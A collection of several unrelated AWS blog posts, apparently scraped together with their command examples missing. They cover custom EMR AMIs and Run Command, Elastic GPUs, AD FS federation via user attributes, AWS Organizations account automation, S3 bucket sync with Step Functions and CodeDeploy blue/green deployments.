Reduction of cluster start time There are certain scenarios where a bootstrap action may affect your cluster start time. For example, your bootstrap action could be doing something like downloading a large program over the internet and delaying the time for your cluster to be ready. By adding and installing a program directly in the AMI, the time to complete a cluster launch may be reduced.

Prevent unexpected bootstrap action failures There are also scenarios where installing and configuring custom software directly in the AMI reduces the risk of unexpected failures. For example, a mirror or repo used by your bootstrap action to download a program might be offline or inaccessible. This could cause your bootstrap action to fail, which could cause a cluster launch failure.

Support for Amazon EBS root volume encryption A number of security and encryption features are available with EMR security configurations. This includes the ability to encrypt data at rest for HDFS (local volumes/Amazon EBS) and Amazon S3. However, certain regulatory/compliance policies may require that the root (boot) volume is also encrypted. By bringing your own Amazon Linux AMI, you can create AMIs that use encrypted EBS root volumes and use those AMIs for your EMR clusters.

Walkthrough

For the examples in this post, I show how you can set up the following solutions:

Automate a workflow of creating custom AMIs with pre-installed software

Run commands or make application configuration changes on all nodes of a running EMR cluster

Before you begin

In this post, the AWS CLI is used to execute the examples and steps shown. However, having the AWS CLI installed is not a requirement and the AWS Management Console can be used to perform the same tasks.

The region used for the examples is us-east-1 (N. Virginia).

Building a custom AMI with Systems Manager Automation

In this section, I show how you can use Automation to create a custom AMI. The following diagram shows an overview of the actions that the Automation will perform:

1) Configure roles for Automation

Before getting started, you have to configure an IAM instance profile role and a service role that Automation can use. The instance profile role gives Automation permission to perform actions on your instances, such as executing commands or starting and stopping services. The service role (or assume role) gives Automation permissions to perform actions on your behalf.

Configuring the required IAM roles for Automation is usually one of the hardest parts of setting up Automation. Luckily, you only do this step one time. We also have an AWS CloudFormation template that can be used to create and configure the required roles for Automation. For more information, see Method 1: Using AWS CloudFormation to Configure Roles for Automation.

2) Create a custom Automation document

An Automation document defines the actions that Systems Manager performs. In this step, you create a custom Automation document (customEmrAmiDocument) that performs the following steps:

Launch an EC2 instance from a base Amazon Linux AMI

Update installed software on the instance

Run additional Linux commands (optional)

Shut down the instance

Create an AMI of the instance

Terminate the instance

To create a custom Automation document, first download the customEmrAmiDocument.json document to your local machine. You can then use the console, AWS CLI, or AWS SDKs to create (upload) that Automation document in your account. The following example shows how to create an Automation document called “customEmrAmiDocument” using the AWS CLI:

Note: Creating an Automation document does not cause that document to be executed. You execute this document in the next step. Also note that file:// must be referenced followed by the path of the content file.

3) Executing the custom Automation document

The “customEmrAmiDocument” Automation document created in the previous step has a list of parameters (SourceAmiId, InstanceIamRole, etc.), along with the description of each parameter. To describe the document parameters, run the following command:

When you start an Automation execution, you must pass the required parameters (SourceAmiId) along with any additional parameters for which you would like to overwrite the default value. For example, if you used CloudFormation to create the required IAM roles, you do not need to specify the InstanceRole and AutomationAssumeRole parameters.

To execute the document without including the InstanceRole and AutomationAssumeRole parameters, run the following command:

If your role names or ARNs have different values than the defaults, make sure that you specify those parameters accordingly. For example, if your instance profile/role is called “MyManagedInstanceProfile” and the Automation service role ARN is “arn:aws:iam::012345678910:role/MyAutomationServiceRole”, then your parameters to execute the Automation should be similar to the following:

I chose “ami-4fffc834” for the SourceAmiId parameter because it’s the latest Amazon Linux AMI in the us-east-1 (N. Virginia) region at the time of publication. It also has all the requirements needed for EMR custom AMIs. If you’re running your Automation document in a different region, set the SourceAmiId parameter to an AMI that’s available in that particular region (ex: “ami-aa5ebdd2” for us-west-2).

4) Finding details about the Automation execution

After the Automation execution is complete, you can view the steps that were executed in addition to the status of each step and their output. To view all Automation executions that used the “customEmrAmiDocument” document, you can run the following command:

The output of the preceding command contains details about each step executed by the Automation execution. To easily find the AMI ID/imageID of the AMI created during the Automation createImage step, run the following command:

For information about how to find the AMI ID of the custom AMI created by Automation, see step 4.

Using Run Command with EMR

In this section, I show how you can use Run Command to send commands to the nodes of a running EMR cluster. The following diagram shows an overview of a Run Command execution:

1) Configure the instance IAM role for Systems Manager

EC2 instances (EMR cluster nodes) need an IAM role to be able to communicate with the Systems Manager API. Because EMR already assigns an IAM role (usually called EMR_EC2_DefaultRole) to each cluster node, you can attach an additional managed policy (Systems Manager policy) to that role.

The following command attaches the “AmazonEC2RoleforSSM” managed policy to the EMR_EC2_DefaultRole role:

2) Install the SSM Agent

Skip this step if your custom AMI was created by Automation. The customEmrAmiDocument Automation document that you used to create the custom AMI installs the SSM agent by default.

The Systems Manager (SSM) agent is used to process System Manager requests and configure your instances as specified in the request. For more information, see Installing SSM Agent on Linux.

3) Running a command with Run Command

You should now be able to run commands or Linux scripts on the instances that have the SSM agent running and the IAM role for SSM configured (Step 1 in this section). To view a list of instances that are ready to receive commands, run the following command:

The easiest way to send a command to all cluster nodes is by using a resource tag as the target for Run Command. If you didn’t add any tags to your EMR cluster during launch, you can add tags using the following command:

The preceding command is sent (executed) to all EC2 instances that have the following tags: environment=”emr-ssm”.

4) Finding details on a Run Command execution

For the Run Command (send-command) that was executed in the previous step, Run Command is executing a command to show the hostname (hostname -f) of an instance and its Python 3 version (python3 -V).

After executing the Run Command (send-command), it should return a “CommandID” field in the output. You can use that command ID to gather information on the instances that the command was sent to and to view the status of the command execution:

Conclusion

This post showed you some of the benefits of using custom AMIs for Amazon EMR and how you can use Automation to automate the management and creation of custom AMIs. I also showed how Run Command can be used to send commands and make configuration changes on all nodes of a running EMR cluster.

If you have questions or suggestions, please comment below.

Additional Reading

About the Author

Bruno Faria is an EMR Solution Architect with AWS. He works with our customers to provide them architectural guidance for running complex applications on Amazon EMR. In his spare time, he enjoys spending time with his family and learning about new big data solutions.

Today we’re excited to announce the general availability of Amazon EC2 Elastic GPUs for Windows. An Elastic GPU is a GPU resource that you can attach to your Amazon Elastic Compute Cloud (EC2) instance to accelerate the graphics performance of your applications. Elastic GPUs come in medium (1GB), large (2GB), xlarge (4GB), and 2xlarge (8GB) sizes and are lower cost alternatives to using GPU instance types like G3 or G2 (for OpenGL 3.3 applications). You can use Elastic GPUs with many instance types allowing you the flexibility to choose the right compute, memory, and storage balance for your application. Today you can provision elastic GPUs in us-east-1 and us-east-2.

Elastic GPUs start at just $0.05 per hour for an eg1.medium. A nickel an hour. If we attach that Elastic GPU to a t2.medium ($0.065/hour) we pay a total of less than 12 cents per hour for an instance with a GPU. Previously, the cheapest graphical workstation (G2/3 class) cost 76 cents per hour. That’s over an 80% reduction in the price for running certain graphical workloads.

When should I use Elastic GPUs?

Elastic GPUs are best suited for applications that require a small or intermittent amount of additional GPU power for graphics acceleration and support OpenGL. Elastic GPUs support up to and including the OpenGL 3.3 API standards with expanded API support coming soon.

Elastic GPUs are not part of the hardware of your instance. Instead they’re attached through an elastic GPU network interface in your subnet which is created when you launch an instance with an Elastic GPU. The image below shows how Elastic GPUs are attached.

Since Elastic GPUs are network attached it’s important to provision an instance with adequate network bandwidth to support your application. It’s also important to make sure your instance security group allows traffic on port 2007.

Any application that can use the OpenGL APIs can take advantage of Elastic GPUs so Blender, Google Earth, SIEMENS SolidEdge, and more could all run with Elastic GPUs. Even Kerbal Space Program!

Ok, now that we know when to use Elastic GPUs and how they work, let’s launch an instance and use one.

Next, we’ll double check to make sure my security group has TCP port 2007 exposed to my VPC so my Elastic GPU can connect to my instance. Finally, we’ll click launch and wait for my instance and Elastic GPU to provision. The best way to do this is to create a separate SG that you can attach to the instance.

You can see an animation of the launch procedure below.

Alternatively we could have launched on the AWS CLI with a quick call like this:

then we could have followed the Elastic GPU software installation instructions here.

We can now see our Elastic GPU is humming along and attached by checking out the Elastic GPU status in the taskbar.

We welcome any feedback on the service and you can click on the Feedback link in the bottom left corner of the GPU Status Box to let us know about your experience with Elastic GPUs.

Elastic GPU Demonstration

Ok, so we have our instance provisioned and our Elastic GPU attached. My teammates here at AWS wanted me to talk about the amazingly wonderful 3D applications you can run, but when I learned about Elastic GPUs the first thing that came to mind was Kerbal Space Program (KSP), so I’m going to run a quick test with that. After all, if you can’t launch Jebediah Kerman into space then what was the point of all of that software? I’ve downloaded KSP and added the launch parameter of -force-opengl to make sure we’re using OpenGL to do our rendering. Below you can see my poor attempt at building a spaceship – I used to build better ones. It looks pretty smooth considering we’re going over a network with a lossy remote desktop protocol.

I’d show a picture of the rocket launch but I didn’t even make it off the ground before I experienced a rapid unscheduled disassembly of the rocket. Back to the drawing board for me.

In the mean time I can check my Amazon CloudWatch metrics and see how much GPU memory I used during my brief game.

Partners, Pricing, and Documentation

To continue to build out great experiences for our customers, our 3D software partners like ANSYS and Siemens are looking to take advantage of the OpenGL APIs on Elastic GPUs, and are currently certifying Elastic GPUs for their software. You can learn more about our partnerships here.

You can find information on Elastic GPU pricing here. You can find additional documentation here.

To govern federated access to your AWS resources, it’s a common practice to use Microsoft Active Directory (AD) groups. When using AD groups, establishing federation requires the number of AD groups to be equal to the number of your AWS accounts multiplied by the number of roles in each of your AWS accounts. As you can imagine, this can result in the creation of a very large number of AD groups to manage federated access.

However, some organizations have limits on how many AD groups they can create. For example, an organization might need to keep its AD group hierarchy reasonably flat and avoid a deep nesting of groups. Such a situation needs a solution that doesn’t require you to create exponentially more AD groups while still allowing you to use access control and automated user integration.

In this blog post, I provide step-by-step instructions for integrating AWS Identity and Access Management (IAM) with Microsoft Active Directory Federation Services (AD FS) by using AD user attributes, allowing you to establish federated access without expanding your total number of AD groups. Your organization’s enterprise administrator probably has existing processes in place for managing AD group memberships and provisioning, and you can extend these processes to the management of AD user attributes and the reduction of your organization’s dependency on AD groups.

Prerequisites

You have created an identity provider (IdP) in your AWS account using your XML file (https://<your-server-name-here>/FederationMetadata/2007-06/FederationMetadata.xml) from your AD FS server. Remember the name of your IdP because you will use it later in this solution.

You have created the appropriate IAM roles in your AWS account, which will be used for federated access.

After you satisfy these prerequisites, you can proceed to the next section of this post to configure your AD users and AD FS server.

Solution overview

To benefit fully from the solution in this post, your AD and AD FS environment should look similar to what is shown in the following diagram. I focus this post on AD users and claim rules in an AD FS server. AD FS claim rules provide the logic to identify who has been correctly set up in AD with the appropriate user attributes to sign in via AD FS to the AWS Management Console.

In the preceding diagram:

An AD user (let’s call him Bob) browses to the AD FS sample site (https://Fully.Qualified.Domain.Name.Here/adfs/ls/IdpInitiatedSignOn.aspx) inside this domain.

The sign-in page authenticates Bob against AD. If Bob is already authenticated or using a domain joined workstation, he also might be prompted for his AD user name and password.

Bob’s browser receives a SAML assertion in the form of an authentication response from AD FS. Bob’s access is authorized based on his AD group membership or on AD user attributes configured on his account.

Bob’s browser automatically posts the SAML assertion to the AWS sign-in endpoint for SAML (https://signin.aws.amazon.com/saml). The endpoint uses the AssumeRoleWithSAML API to request temporary security credentials and then constructs a sign-in URL for the AWS Management Console using those credentials.

Bob’s browser receives the sign-in URL and redirects to the AWS Management Console.

Deploy the solution

A. Configure an AD user’s account

Because the AD user attributes hold all the associated AWS account and role information when using this solution, you will start by configuring an AD user’s accounts.

To edit the user attributes in an AD user’s account:

On your AD server, in the Active Directory Users and Computers console, go to View > Advanced Features in Active Directory Users and Computers to see the Attribute editor tab.

For AD user Bob, edit one attribute using the built-in AD attribute editor. The attribute I am using is url, which is a multi-valued string. If you use another AD user attribute, consider how you will need to modify your AD FS claim rules later because different attributes may return the values differently back to the AD FS server. The name of the AD user attribute will be used in the AD FS claim rules later in this post.

Bob has two AWS accounts: 111122223333 and 444455556666. Each of Bob’s AWS accounts has two roles: AWS-Dev and AWS-ReadOnly. I have configured Bob’s url attribute with the corresponding values associated with his AWS accounts and roles. As part of the attribute entries, I prefixed each entry with AWS- to have a unique identifier. As shown in the following screenshot, I added the entries one at a time so that each value can be returned back to my AD FS server:

AWS-111122223333-Dev

AWS-111122223333-ReadOnly

AWS-444455556666-Dev

AWS-444455556666-ReadOnly

Bob also requires an email address because that information will be used in the role session name when Bob signs in to the AWS Management Console via his chosen AWS account and associated role. We use Bob’s email address only because it’s a common user attribute most users have and is also unique across users. The unique identifier is then forwarded by AD FS to be used by AWS as a unique value for users. If you have enabled AWS CloudTrail, the role session name is captured in CloudTrail and allows for ease of identification of who assumed the role and subsequent API calls the user or role might have executed on the platform (for example, ec2:terminateinstance).

Now that you have configured Bob’s account, you will configure the AD FS server claim rules.

B. Configure the AD FS server claim rules

Because this blog post assumes your environment is already up and running and to ensure that you can follow along, I am providing example Windows PowerShell code that you can run on your AD FS server. This code allows you to choose a conventional approach by using AD groups in AD FS claim rules, or for the purposes of this post, to use AD FS claim rules with AD user attributes. If you use the AD group approach on your AD FS server with the example code, your AD group naming convention must be: AWS-YourAccountNumber–YourRoleName. If you have already created claim rules for AWS on your AD FS server, I encourage you to run this code against a different AD FS server that has no existing AWS rules.

To configure the AD FS claim rules:

Open the AD FS console. You can find it by searching for ad, as shown in the following screenshot.

Expand Trust Relationships and choose Relying Party Trusts.

Run the example Windows PowerShell code from the command prompt in the same directory where you extracted the .zip file. The following screenshot shows a list of the example files from the .zip file.

Run the 01-Configure-ADFS-AD-User-URL-mapping.ps1 Windows PowerShell script to set up the AD FS claim rules. Note: Run this script with Administrative permissions. A log file is generated to which you can refer, as shown in the following screenshot.

After you run the Windows PowerShell script, you will see the new relying party trust that has been created in your AD FS configuration for Amazon Web Services, as shown in the following screenshot.

The following screenshot shows what your AD FS server claim rules should look like now.

About these four claim rules:

Claim rule 1 captures the Windows account name of the current user whose attributes will then be queried further with claim rule 3.

Claim rule 2 captures Bob’s email address for use in the role session name.

Claim rule 3 queries the current user’s URL attributes to identify which account and role the user is authorized to assume access to. These URL attribute values are then stored in a variable (http://temp/variable) for use in claim rule 4.

Claim rule 4 works by matching the first pattern match, ([^d]{12}), to $1 and the second pattern match, (\w*), to $2 for each entry in http://temp/variable. With this final rule, you define the resulting value for the AWS role attribute in a dynamic way, which allows the configuration to scale to support virtually any number of AWS accounts and IAM roles without further configuration within AD FS. By using these claim rules, you query, store, and then convert the values in the URL attributes to the IAM role attributes that AWS expects.

At the beginning of this post, I mentioned that you need to remember the name of the IdP you created in your AWS account, and now is when you will use your IdP’s name. Replace myADFS, highlighted in the following code, with the name of your IdP. (When modifying the rules, be careful not to insert any additional spaces because they can cause claim rules to not work as designed.)

C. Test AD user Bob’s federated access

Go to the AD FS sign-in page (https://Fully.Qualified.Domain.Name.Here/adfs/ls/IdpInitiatedSignOn.aspx) to test Bob’s federated access. Note that you might see a certificate warning if the server uses a locally self-signed certificate from Internet Information Services.

To test Bob’s federated access:

Choose Sign in to one of the following sites, choose Amazon Web Services& AD User URL from the list, and then choose Continue to Sign In.

If prompted, type Bob’s user name and password. You will be redirected to sign in to the Amazon Web Services AD FS page previously defined when you set up the AD FS relying party trusts.

After you authenticate to the server as Bob, your browser is redirected to https://signin.aws.amazon.com/saml, and you can choose which of Bob’s accounts and roles to use from. Choose a role and then choose Sign In.

You have signed in as Bob, and his email address now appears as part of the role session name, as shown in the following screenshot.

You can now see Bob’s email address used in the role session name. If you have enabled CloudTrail, the role session name is captured in CloudTrail and allows you to easily identify who assumed the role. If Bob wants to switch to a different account or role, he can return to his AD FS sign-in page (https://Fully.Qualified.Domain.Name.Here/adfs/ls/IdpInitiatedSignOn.aspx) and choose an alternative account or role.

Summary

In this blog post, I demonstrated how to use dynamic resolution of federated access using AD user attributes to scale your configuration and support a large number of AWS accounts and associated IAM roles. This is a powerful technique for managing a large number of AWS accounts and the federated access of associated AD users. Even though I demonstrate the integration of IAM with AD FS and AD, you can replicate this solution across your choice of SAML federated access technology, such as Shibboleth or OpenLDAP.

If you have comments about this blog post, submit them in the “Comments” section below. If you have implementation or troubleshooting questions, start a new thread on the IAM forum.

In this blog post, I demonstrate the step-by-step process for end-to-end account creation in Organizations as well as how to automate the entire process. I also show how to move a new account into an organizational unit (OU).

Process overview

The following process flow diagram illustrates the steps required to create an account, configure the account, and then move it into an OU so that the account can take advantage of the centralized SCP functionality in Organizations. The tasks in the blue nodes occur in the master account in the organization in question, and the task in the orange node occurs in the new member account I create. In this post, I provide a script (in both Bash/CLI and Python) that you can use to automate this account creation process, and I walk through each step shown in the diagram to explain the process in detail. For the purposes of this post, I use the AWS CLI in combination with CloudFormation to create and configure an account.

The account creation process

Follow the steps in this section to create an account, configure it, and move it into an OU. I am also providing a script and CloudFormation templates that you can use to automate the entire process.

1. Sign in to AWS Organizations

In order to create an account, you must sign in to your organization’s master account with a minimum of the following permissions:

organizations:DescribeOrganization

organizations:CreateAccount

2. Create a new member account

After signing in to your organization’s master account, create a new member account. Before you can create the member account, you need three pieces of information:

An account name – The friendly name of the member account, which you can find on the Accounts tab in the master account.

An email address – The email address of the owner of the new member account. This email address is used by AWS when we need to contact the account owner.

An IAM role name – The name of an IAM role that Organizations automatically preconfigures in the new member account. This role trusts the master account, allowing users in the master account to assume the role, as permitted by the master account administrator. The role also has administrator permissions in the new member account. If you do not change the role’s name, the name defaults to OrganizationAccountAccessRole.

To explain the placeholder values in the preceding command that you must update with your own values:

newAccEmail – The email address of the owner of the new member account. This email address must not already be associated with another AWS account.

newAccName – The friendly name of the new member account.

roleName – The name of an IAM role that Organizations automatically preconfigures in the new member account. The default name is OrganizationAccountAccessRole.

This CLI command returns a request_id that uniquely identifies the request, a value that is required for in Step 3.

Important: When you create an account using Organizations, you currently cannot remove this account from your organization. This, in turn, can prevent you from later deleting the organization.

3. Verify account creation

Account creation may take a few seconds to complete, so before doing anything with the newly created account, you must first verify the account creation status. To check the status, you must have at least the following permission:

organizations:DescribeCreateAccountStatus

The following CLI command, with the request_id returned in the previous step as an input parameter, verifies that the account was created:

The command returns the state of your account creation request and can have three different values: IN_PROGRESS, SUCCEEDED, and FAILED.

4. Assume a role

After you have verified that the new account has been created, configure the account. In order to configure the newly created account, you must sign in with a user who has permission to assume the role submitted in the createAccount API call. In the example in Step 1, I named the role OrganizationAccountAccessRole; however, if you revised the name of the role, you must use that revised name when assuming the role. Note that when an account is created from within an organization, cross-account trust between the master and programmatically created accounts is automatically established.

5. Configure the new account

After you assume the role, build the new account’s networking, IAM, and governance resources as explained in this section. Again, to learn more about and download the account creation script and the templates that can automate this process, see “Automating the entire end-to-end process” later in this post.

Create AWS Config rules to help manage and enforce standards for resources deployed on AWS.

Develop a tagging strategy that specifies a minimum set of tags required on every taggable resource. A tagging rule checks that all resources created or edited fulfill this requirement. A noncompliance report is created to document resources that do not meet the AWS Config rule. AWS Lambda scripts can also be launched as a result of AWS Config rules.

6. Move the new account into an OU

Before allowing your development teams to access the new member account that you configured in the previous steps, apply an SCP to the account to limit the API calls that can be made by all users. To do this, you must move the member account into an OU that has an SCP attached to it.

An OU is a container for accounts. It can contain other OUs, allowing you to create a hierarchy that resembles an upside-down tree with a “root” at the top and OU “branches” that reach down, ending with accounts that are the “leaves” of the tree. When you attach a policy to one of the nodes in the hierarchy, it affects all the branches (OUs) and leaves (accounts) under it. An OU can have exactly one parent, and currently, each account can be a member of exactly one OU.

To explain the placeholder values in the preceding command that you must update with your own values:

account_id – The unique identifier (ID) of the account you want to move.

source_parent_id – The unique ID of the root or OU from which you want to move the account.

destination_parent_id – The unique ID of the root or OU to which you want to move the account.

7. Reduce the IAM role permissions

The OrganizationAccountAccessRole is created with full administrative permissions to enable the creation and development of the new member account. After you complete the development process and you have moved the member account into an OU, reduce the permissions of OrganizationAccountAccessRole to match your anticipated use of this role going forward.

Automating the entire end-to-end process

To help you fully automate the process of creating new member accounts, setting up those accounts, and moving new member accounts into an OU, I am providing a script in both Bash/CLI and Python. You can modify or call additional CloudFormation templates as needed.

Download the script and CloudFormation templates

Download the script and CloudFormation templates to help you automate this end-to-end process. The global variables in the script are set in the opening lines of code. Update these variables’ values, and they will flow as input parameters to the API commands when the script is executed. I have prepopulated the roleName by using AWS best practices nomenclature, but you can use a custom name.

I am including the following descriptions of the elements of the script to give you a better idea of how the script works.

Bash/CLI:

Organization-new-acc.sh – An example shell script that includes parameters, account creation, and a call to the JSON sample templates for each of three subtasks in Step 5 earlier in this post.

CF-VPC.json – An example Cloud Formation template that creates and configures a VPC in the new member account. Each AWS account must have at least one VPC as a networking construct where you can deploy customer resources. Though AWS does create a default VPC when an account is created, you must configure that VPC to meet your needs. This includes creating subnets with specific IP Classless Inter-Domain Routing (CIDR) blocks, creating gateways (including an Internet gateway, a customer gateway, a VPN tunnel, AWS Storage Gateway, Amazon API Gateway, and a NAT gateway), and VPC peering connections. Web ACLs are also part of this process to limit the source IP addresses and ports that can access the VPC. The VPC created by this script includes four subnets across two Availability Zones. Two of the subnets are public and two are private.

CF-IAM.json – An example Cloud Formation template that creates IAM roles in the new member account. As part of a security baseline, you should develop a standard set of IAM roles and related policies. Update this template with the IAM role definitions and policies you want to create in the member account to controls privilege and access.

CF-ConfigRules.json – An example Cloud Formation template that creates an AWS Config rule to enforce tagging standards on resources created in the new account.

Organization_Output.docx – Example output of the results from running Organization-new-acc.sh.

Python:

Create_account_with_iam.py – An example Python template that creates an account, moves it into an OU, applies an SCP, and then calls additional templates to deploy resources. CF-VPC.JSON can be called by this template if you first customize the .json file.

Summary

In this post, I have demonstrated the step-by-step process for end-to-end account creation in Organizations as well as how to automate the entire process. I also showed how to move a new account into an OU. This solution should save you some time and help you avoid common issues that tend to crop up in the manual account-creation process. To learn more about the features of Organizations, see the AWS Organizations User Guide. For more information about the APIs used in this post, see the Organizations API Reference.

If you have comments about this blog post, submit them in the “Comments” section below. If you have implementation or troubleshooting questions, start a new thread on the Organizations forum.

In my free time, I run a small blog that uses Amazon S3 to host static content and Amazon CloudFront to distribute it world-wide. I use a home-grown, static website generator to create and upload my blog content onto S3.

My blog uses two S3 buckets: one for staging and testing, and one for production. As a website owner, I want to update the production bucket with all changes from the staging bucket in a reliable and efficient way, without having to create and populate a new bucket from scratch. Therefore, to synchronize files between these two buckets, I use AWS Lambda and AWS Step Functions.

In this post, I show how you can use Step Functions to build a scalable synchronization engine for S3 buckets and learn some common patterns for designing Step Functions state machines while you do so.

Step Functions overview

Step Functions makes it easy to coordinate the components of distributed applications and microservices using visual workflows. Building applications from individual components that each perform a discrete function lets you scale and change applications quickly.

While this particular example focuses on synchronizing objects between two S3 buckets, it can be generalized to any other use case that involves coordinated processing of any number of objects in S3 buckets, or other, similar data processing patterns.

Bucket replication options

Before I dive into the details on how this particular example works, take a look at some alternatives for copying or replicating data between two Amazon S3 buckets:

The AWS CLI provides customers with a powerful aws s3 sync command that can synchronize the contents of one bucket with another.

S3DistCP is a powerful tool for users of Amazon EMR that can efficiently load, save, or copy large amounts of data between S3 buckets and HDFS.

In this use case, you are looking for a slightly different bucket synchronization solution that:

Works within the same region

Is more scalable than a CLI approach running on a single machine

Doesn’t require managing any servers

Uses a more finely grained cost model than the hourly based Amazon EMR approach

You need a scalable, serverless, and customizable bucket synchronization utility.

Solution architecture

Your solution needs to do three things:

Copy all objects from a source bucket into a destination bucket, but leave out objects that are already present, for efficiency.

Delete all "orphaned" objects from the destination bucket that aren’t present on the source bucket, because you don’t want obsolete objects lying around.

Keep track of all objects for #1 and #2, regardless of how many objects there are.

In the beginning, you read in the source and destination buckets as parameters and perform basic parameter validation. Then, you operate two separate, independent loops, one for copying missing objects and one for deleting obsolete objects. Each loop is a sequence of Step Functions states that read in chunks of S3 object lists and use the continuation token to decide in a choice state whether to continue the loop or not.

This solution is based on the following architecture that uses Step Functions, Lambda, and two S3 buckets:

As you can see, this setup involves no servers, just two main building blocks:

Step Functions manages the overall flow of synchronizing the objects from the source bucket with the destination bucket.

A set of Lambda functions carry out the individual steps necessary to perform the work, such as validating input, getting lists of objects from source and destination buckets, copying or deleting objects in batches, and so on.

To understand the synchronization flow in more detail, look at the Step Functions state machine diagram for this example.

Walkthrough

Here’s a detailed discussion of how this works.

To follow along, use the code in the sync-buckets-state-machine GitHub repo. The code comes with a ready-to-run deployment script in Python that takes care of all the IAM roles, policies, Lambda functions, and of course the Step Functions state machine deployment using AWS CloudFormation, as well as instructions on how to use it.

Fine print: Use at your own risk

Before I start, here are some disclaimers:

Educational purposes only.

The following example and code are intended for educational purposes only. Make sure that you customize, test, and review it on your own before using any of this in production.

S3 object deletion.

In particular, using the code included below may delete objects on S3 in order to perform synchronization. Make sure that you have backups of your data. In particular, consider using the Amazon S3 Versioning feature to protect yourself against unintended data modification or deletion.

Step Functions execution starts with an initial set of parameters that contain the source and destination bucket names in JSON:

Step 1: Detect the bucket region

First, you need to know the regions where your buckets reside. In this case, take advantage of the Step Functions Parallel state. This allows you to use a Lambda function get_bucket_location.py inside two different, parallel branches of task states:

FindRegionForSourceBucket

FindRegionForDestinationBucket

Each task state receives one bucket name as an input parameter, then detects the region corresponding to "their" bucket. The output of these functions is collected in a result array containing one element per parallel function.

Step 2: Combine the parallel states

The output of a parallel state is a list with all the individual branches’ outputs. To combine them into a single structure, use a Lambda function called combine_dicts.py in its own CombineRegionOutputstask state. The function combines the two outputs from step 1 into a single JSON dict that provides you with the necessary region information for each bucket.

Step 3: Validate the input

In this walkthrough, you only support buckets that reside in the same region, so you need to decide if the input is valid or if the user has given you two buckets in different regions. To find out, use a Lambda function called validate_input.py in the ValidateInputtask state that tests if the two regions from the previous step are equal. The output is a Boolean.

Step 4: Branch the workflow

Use another type of Step Functions state, a Choice state, which branches into a Failure state if the comparison in step 3 yields false, or proceeds with the remaining steps if the comparison was successful.

Step 5: Execute in parallel

The actual work is happening in another Parallel state. Both branches of this state are very similar to each other and they re-use some of the Lambda function code.

Each parallel branch implements a looping pattern across the following steps:

Use a Pass state to inject either the string value "source" (InjectSourceBucket) or "destination" (InjectDestinationBucket) into the listBucket attribute of the state document.

The next step uses either the source or the destination bucket, depending on the branch, while executing the same, generic Lambda function. You don’t need two Lambda functions that differ only slightly. This step illustrates how to use Pass states as a way of injecting constant parameters into your state machine and as a way of controlling step behavior while re-using common step execution code.

The next step UpdateSourceKeyList/UpdateDestinationKeyList lists objects in the given bucket.

Remember that the previous step injected either "source" or "destination" into the state document’s listBucket attribute. This step uses the same list_bucket.py Lambda function to list objects in an S3 bucket. The listBucket attribute of its input decides which bucket to list. In the left branch of the main parallel state, use the list of source objects to work through copying missing objects. The right branch uses the list of destination objects, to check if they have a corresponding object in the source bucket and eliminate any orphaned objects. Orphans don’t have a source object of the same S3 key.

This step performs the actual work. In the left branch, the CopySourceKeys step uses the copy_keys.py Lambda function to go through the list of source objects provided by the previous step, then copies any missing object into the destination bucket. Its sister step in the other branch, DeleteOrphanedKeys, uses its destination bucket key list to test whether each object from the destination bucket has a corresponding source object, then deletes any orphaned objects.

The S3 ListObjects API action is designed to be scalable across many objects in a bucket. Therefore, it returns object lists in chunks of configurable size, along with a continuation token. If the API result has a continuation token, it means that there are more objects in this list. You can work from token to token to continue getting object list chunks, until you get no more continuation tokens.

By breaking down large amounts of work into chunks, you can make sure each chunk is completed within the timeframe allocated for the Lambda function, and within the maximum input/output data size for a Step Functions state.

This approach comes with a slight tradeoff: the more objects you process at one time in a given chunk, the faster you are done. There’s less overhead for managing individual chunks. On the other hand, if you process too many objects within the same chunk, you risk going over time and space limits of the processing Lambda function or the Step Functions state so the work cannot be completed.

In this particular case, use a Lambda function that maximizes the number of objects listed from the S3 bucket that can be stored in the input/output state data. This is currently up to 32,768 bytes, assuming (based on some experimentation) that the execution of the COPY/DELETE requests in the processing states can always complete in time.

A more sophisticated approach would use the Step Functions retry/catch state attributes to account for any time limits encountered and adjust the list size accordingly through some list site adjusting.

Step 6: Test for completion

Because the presence of a continuation token in the S3 ListObjects output signals that you are not done processing all objects yet, use a Choice state to test for its presence. If a continuation token exists, it branches into the UpdateSourceKeyList step, which uses the token to get to the next chunk of objects. If there is no token, you’re done. The state machine then branches into the FinishCopyBranch/FinishDeleteBranch state.

By using Choice states like this, you can create loops exactly like the old times, when you didn’t have for statements and used branches in assembly code instead!

Step 7: Success!

Finally, you’re done, and can step into your final Success state.

Lessons learned

When implementing this use case with Step Functions and Lambda, I learned the following things:

Sometimes, it is necessary to manipulate the JSON state of a Step Functions state machine with just a few lines of code that hardly seem to warrant their own Lambda function. This is ok, and the cost is actually pretty low given Lambda’s 100 millisecond billing granularity. The upside is that functions like these can be helpful to make the data more palatable for the following steps or for facilitating Choice states. An example here would be the combine_dicts.py function.

Pass states can be useful beyond debugging and tracing, they can be used to inject arbitrary values into your state JSON and guide generic Lambda functions into doing specific things.

Choice states are your friend because you can build while-loops with them. This allows you to reliably grind through large amounts of data with the patience of an engine that currently supports execution times of up to 1 year.

Currently, there is an execution history limit of 25,000 events. Each Lambda task state execution takes up 5 events, while each choice state takes 2 events for a total of 7 events per loop. This means you can loop about 3500 times with this state machine. For even more scalability, you can split up work across multiple Step Functions executions through object key sharding or similar approaches.

It’s not necessary to spend a lot of time coding exception handling within your Lambda functions. You can delegate all exception handling to Step Functions and instead simplify your functions as much as possible.

Step Functions are great replacements for shell scripts. This could have been a shell script, but then I would have had to worry about where to execute it reliably, how to scale it if it went beyond a few thousand objects, etc. Think of Step Functions and Lambda as tools for scripting at a cloud level, beyond the boundaries of servers or containers. "Serverless" here also means "boundary-less".

Summary

This approach gives you scalability by breaking down any number of S3 objects into chunks, then using Step Functions to control logic to work through these objects in a scalable, serverless, and fully managed way.

Amazon Web Services offers services that enable organizations to leverage the power of the cloud for their development and deployment needs. AWS CodeDeploy makes it possible to automate the deployment of code to either Amazon EC2 or on-premises instances. AWS CodeDeploy now supports blue/green deployments. In this blog post, I will discuss the benefits of blue/green deployments and show you how to perform one.

The benefits of blue/green deployments

Blue/green deployment involves two production environments:

Blue is the active environment.

Green is for the release of a new version.

Here are some of the advantages of a blue/green deployment:

You can perform testing on the green environment without disrupting the blue environment.

Switching to the green environment involves no downtime. It only requires the redirecting of user traffic.

Rolling back from the green environment to the blue environment in the event of a problem is easier because you can redirect traffic to the blue environment without having to rebuild it.

You can incorporate the principle of infrastructure immutability by provisioning fresh instances when you need to make changes. In this way, you avoid configuration drift.

AWS CodeDeploy offers two ways to perform blue/green deployments:

